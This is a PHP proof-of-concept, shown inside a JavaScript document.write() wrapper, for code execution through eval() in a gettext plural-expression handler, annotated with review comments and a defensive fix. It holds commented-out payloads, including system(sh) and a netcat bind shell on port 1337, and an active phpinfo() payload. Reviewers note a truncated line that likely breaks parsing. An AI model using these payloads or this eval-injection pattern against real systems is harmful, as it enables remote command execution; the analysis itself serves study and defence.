document.write('
  1. <?php
     // Proof of concept for code execution through eval() in a plural-expression handler:
     // $expr is filtered by a character allow-list, rewritten by the ternary-parenthesis
     // loop, and the resulting string is passed to eval() on the last statement.
     // NOTE(review): the gettext.php reference further down suggests $expr stands in for a
     // plural expression read from a translation file - confirm against that file.
     // The two commented-out assignments are alternative payloads left by the author;
     // only the phpinfo() assignment is active.
  2. //$expr= ("system(sh)");  // payload1
  3. //$expr= (`nc -l -p 1337 -e /bin/sh`); // payload that is not eval-dependant
  4. $expr=("phpinfo()"); // payload2 (PoC)
  5.  
     // Allow-list filter: every character outside letters, digits, underscore, colon,
     // semicolon, parentheses and the listed operator characters is removed. Identifiers
     // and parentheses survive, so a bare function call such as the phpinfo() string above
     // passes through unchanged - the filter does not keep call syntax away from eval().
     // NOTE(review): the active line ends in a lone slash, apparently a truncated copy of
     // the trailing comment on the commented-out line; likely a parse error as written.
  6. //$expr = preg_replace(\'@[^a-zA-Z0-9_:;\\(\\)\\?\\|\\&=!<>+*/\\%-]@\', \'\', $expr);//  vuln
  7. $expr = preg_replace(\'@[^a-zA-Z0-9_:;\\(\\)\\?\\|\\&=!<>+*/\\%-]@\', \'\', $expr);/
  8.  
     // Terminate the expression with a semicolon.
  9. $expr .= \';\';
  10.  
  11.  // Add parentheses for the ternary \'?\' operator.
     // This append repeats the one above, so $expr now ends in two semicolons.
  12. $expr .= \';\';
     // $res accumulates the rewritten expression; $p counts the parentheses opened for
     // a question mark that have not been closed yet.
  13. $res = \'\';
  14. $p = 0;
     // Walk $expr one byte at a time and copy it into $res, wrapping ternary branches.
  15. for ($i = 0; $i < strlen($expr); $i++) {
  16.     $ch = $expr[$i];
  17.     switch ($ch) {
             // Question mark: open a parenthesis for the true branch and remember it.
  18.         case \'?\':
  19.             $res .= \' ? (\';
  20.             $p++;
  21.             break;
             // Colon: close the true branch and open the false branch ($p is unchanged).
  22.         case \':\':
  23.             $res .= \') : (\';
  24.             break;
             // Semicolon: close every parenthesis still open, end the statement, reset $p.
  25.         case \';\':
  26.             $res .= str_repeat( \')\', $p) . \';\';
  27.             $p = 0;
  28.             break;
         // Any other character is copied through untouched, identifiers included.
  29.     default:
  30.         $res .= $ch;
  31.     }
  32. }
  33.    
  34. // Vulnerable function :
     // NOTE(review): $n and $total look like stand-ins for the arguments and state of the
     // original function - confirm against gettext.php.
  35. $n= (1);
  36. $total=("1000");
  37.  
     // Type guard on $n only; the integer literal assigned above passes it, and the check
     // does not look at the expression string at all.
  38.  if (!is_int($n)) {
  39.       throw new InvalidArgumentException(
  40.         "Select_string only accepts integers: " . $n); // tested against version 2 of gettext.php
  41. }
  42.  
     // Each call below reads $res and overwrites $string, so only the result of the last
     // call reaches eval(); the first two results are discarded. The second call also uses
     // $res, not $n, as the replacement value.
  43. $string = str_replace(\'nplurals\',"\\$total",$res);
  44. $string = str_replace("n",$res,$res);
  45. $string = str_replace(\'plural\',"\\$plural",$res);
     // SECURITY: eval() runs the filtered expression as PHP code. With the active input the
     // string still contains the phpinfo() call, so that call executes here.
     // Defensive fix: evaluate plural rules with a dedicated expression parser or a fixed
     // table of known rules instead of eval(), and treat the source of the expression as
     // untrusted input.
  46. eval("$string");
  47. ?>
');